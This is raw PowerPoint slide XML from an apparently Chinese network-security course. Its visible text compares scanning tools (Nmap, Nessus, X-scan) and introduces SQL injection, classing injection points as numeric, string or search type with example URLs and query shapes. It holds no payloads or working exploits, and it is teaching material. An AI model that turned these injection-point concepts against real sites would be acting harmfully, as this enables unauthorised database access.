                                          <p:spTgt spid="1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35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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4" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="19"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 grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="137" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="136"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614861" y="1261268"/>
            <a:ext cx="3771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常用扫描工具比较</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="172" name="Group 172"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2484436" y="3086099"/>
            <a:ext cx="8034342" cy="3579816"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8034340" cy="3579814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="142" name="Group 142"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="2968624"/>
              <a:ext cx="1833927" cy="611191"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1833926" cy="611190"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="140" name="Shape 140"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="1833928" cy="611192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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41" name="Shape 141"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="158648" y="50323"/>
                <a:ext cx="1516631"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2400">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Light"/>
                    <a:ea typeface="Helvetica Light"/>
                    <a:cs typeface="Helvetica Light"/>
                    <a:sym typeface="Helvetica Light"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>主机扫描</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="145" name="Group 145"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2008584" y="2968624"/>
              <a:ext cx="1921258" cy="611191"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1921256" cy="611190"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="143" name="Shape 143"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="1921258" cy="611192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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44" name="Shape 144"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="202313" y="50323"/>
                <a:ext cx="1516631"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2400">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Light"/>
                    <a:ea typeface="Helvetica Light"/>
                    <a:cs typeface="Helvetica Light"/>
                    <a:sym typeface="Helvetica Light"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>端口扫描</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="148" name="Group 148"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4104497" y="2968624"/>
              <a:ext cx="1921259" cy="611191"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1921258" cy="611190"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="146" name="Shape 146"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="1921260" cy="611192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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47" name="Shape 147"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="299279" y="50323"/>
                <a:ext cx="1322698"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b="1" sz="2400">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:t>OS</a:t>
                </a:r>
                <a:r>
                  <a:rPr b="0">
                    <a:latin typeface="Helvetica Light"/>
                    <a:ea typeface="Helvetica Light"/>
                    <a:cs typeface="Helvetica Light"/>
                    <a:sym typeface="Helvetica Light"/>
                  </a:rPr>
                  <a:t>识别</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="151" name="Group 151"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6200412" y="2968624"/>
              <a:ext cx="1833929" cy="611191"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1833927" cy="611190"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="149" name="Shape 149"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="-1"/>
                <a:ext cx="1833929" cy="611192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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50" name="Shape 150"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="158648" y="50323"/>
                <a:ext cx="1516633"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2400">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Light"/>
                    <a:ea typeface="Helvetica Light"/>
                    <a:cs typeface="Helvetica Light"/>
                    <a:sym typeface="Helvetica Light"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>漏洞扫描</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="154" name="Group 154"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="785966" y="-1"/>
              <a:ext cx="1571939" cy="611191"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1571938" cy="611190"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="152" name="Shape 152"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="1571939" cy="611192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CC99FF"/>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53" name="Shape 153"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="241032" y="87059"/>
                <a:ext cx="1089873" cy="437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b="1" sz="2400">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>Nmap</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="157" name="Group 157"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3143871" y="-1"/>
              <a:ext cx="1746598" cy="611191"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1746597" cy="611190"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Shape 155"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="1746599" cy="611192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CC99FF"/>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56" name="Shape 156"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="192250" y="87059"/>
                <a:ext cx="1362097" cy="437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b="1" sz="2400">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>Nessus</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="160" name="Group 160"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5501773" y="-1"/>
              <a:ext cx="1746599" cy="611191"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1746598" cy="611190"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="158" name="Shape 158"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1" y="-1"/>
                <a:ext cx="1746600" cy="611192"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CC99FF"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="024631"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="0"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr b="1" sz="1800">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="159" name="Shape 159"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="240861" y="87059"/>
                <a:ext cx="1264877" cy="437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b="1" sz="2400">
                    <a:solidFill>
                      <a:srgbClr val="024631"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>X-scan</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name="Shape 161"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="698637" y="611187"/>
              <a:ext cx="873301"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2" name="Shape 162"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1571935" y="611187"/>
              <a:ext cx="1222618"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3" name="Shape 163"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1571935" y="611186"/>
              <a:ext cx="3318532" cy="2357441"/>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4" name="Shape 164"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="960626" y="611187"/>
              <a:ext cx="2881886"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5" name="Shape 165"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2881881" y="611187"/>
              <a:ext cx="960631"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6" name="Shape 166"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3842509" y="611187"/>
              <a:ext cx="1047960"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7" name="Shape 167"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3842509" y="611187"/>
              <a:ext cx="2969213"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sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="Shape 168"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1222615" y="611186"/>
              <a:ext cx="4977801" cy="2357441"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="45718" tIns="45718" rIns="45718" bIns="45718" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="Shape 169"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2969211" y="611187"/>
              <a:ext cx="3231203" cy="2357440"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="45718" tIns="45718" rIns="45718" bIns="45718" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="170" name="Shape 170"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4890465" y="611187"/>
              <a:ext cx="1309951" cy="2357440"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="45718" tIns="45718" rIns="45718" bIns="45718" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Shape 171"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6200412" y="611187"/>
              <a:ext cx="611310" cy="2357440"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="45718" tIns="45718" rIns="45718" bIns="45718"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xfrm>
            <a:off x="952500" y="954087"/>
            <a:ext cx="11099800" cy="2159001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SQL注入漏洞及防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665161" y="3872705"/>
            <a:ext cx="11671403"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注入攻击的本质，是把用户输入的数据当作代码来执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>这里有两个关键条件，第一个是用户能够控制输入；第</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>二个是原本程序要执行的代码，拼接了用户的输入数据。</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a:off x="1012494" y="761999"/>
            <a:ext cx="10979811" cy="822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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="3200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="3200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2300">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>数字型注入点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>形如：	    http://www.xxx.com/article.php?id=123 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>                  其注入点 id 类型为数字，所以叫数字型注入点。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="7" algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>                  这种的 SQL 语句原型大致是 select * from 表名 where id=1。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="7" algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr lvl="7" algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="1900">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>字符型注入点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>形如：	    http://www.xxx.com/article.php?date=today  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>                     其注入点 date 类型为字符类型，所以叫字符型注入点。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	            这种的 SQL 语句原型大致是 select * from 表名 where date=‘today’  （注意引号）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="1900">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>搜索型注入点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>形如：	   http://www.xxx.com/article.php?id=159&amp;key=关键字	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	            这类注入主要是指在进行数据搜索时没过滤搜索参数，有的在地址中存在“key=关键字”，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	            或者有的不显示在的链接地址里面，而是通过input表单提交。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	            这种的 SQL 语句原型大致是select * from 表名 where 字段 like ‘%关键字%’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	         </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 178"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="547687"/>
            <a:ext cx="6500978" cy="1264493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="438150">
              <a:defRPr sz="5100"/>
